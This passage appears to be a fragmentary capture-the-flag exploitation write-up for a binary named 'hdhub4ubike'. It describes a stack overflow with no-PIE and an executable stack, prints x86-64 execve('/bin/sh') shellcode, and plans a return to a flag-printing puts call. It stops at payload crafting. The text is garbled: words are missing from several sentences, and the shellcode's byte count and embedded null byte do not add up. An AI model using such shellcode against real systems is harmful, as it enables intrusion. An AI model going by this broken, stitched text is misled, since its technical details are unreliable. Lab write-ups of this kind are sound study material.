
Hdhub4ubike

```
$ ./hdhub4ubike
=== Welcome to the HD Bike Hub ===
Enter your hub key:
```

Static analysis quickly reveals that the binary is stripped (no symbols) and that it is compiled with , -z execstack, and -no-pie – classic "easy pwn" settings.

```c
/* ---------------------------------------------------- */
int check_key(const char *key)
{
    // key must be exactly 0x30 bytes long
    if (strlen(key) != 0x30)
        return 0;
```

```python
# 32-byte execve("/bin/sh") shellcode (x86-64)
shellcode = (
    b"\x48\x31\xd2"                              # xor rdx, rdx
    b"\x48\x31\xf6"                              # xor rsi, rsi
    b"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00"  # movabs rdi, "/bin/sh"
    b"\x57"                                      # push rdi
    b"\x48\x89\xe7"                              # mov rdi, rsp
    b"\xb0\x3b"                                  # mov al, 0x3b
    b"\x0f\x05"                                  # syscall
)
```

```
0x0040119f: lea rdi, [rip+0x2000]   ; address of the flag string
0x004011a6: call puts@plt
```

0x004011a6 is the (the call instruction itself). If we return to this address after the overflow, the program will execute the puts call with the correct argument already loaded (the lea instruction that loads the flag pointer into rdi is right before it).

Therefore we want our to be 0x004011a6.

3.2 Crafting the payload

The stack layout (simplified) at the moment of the overflow: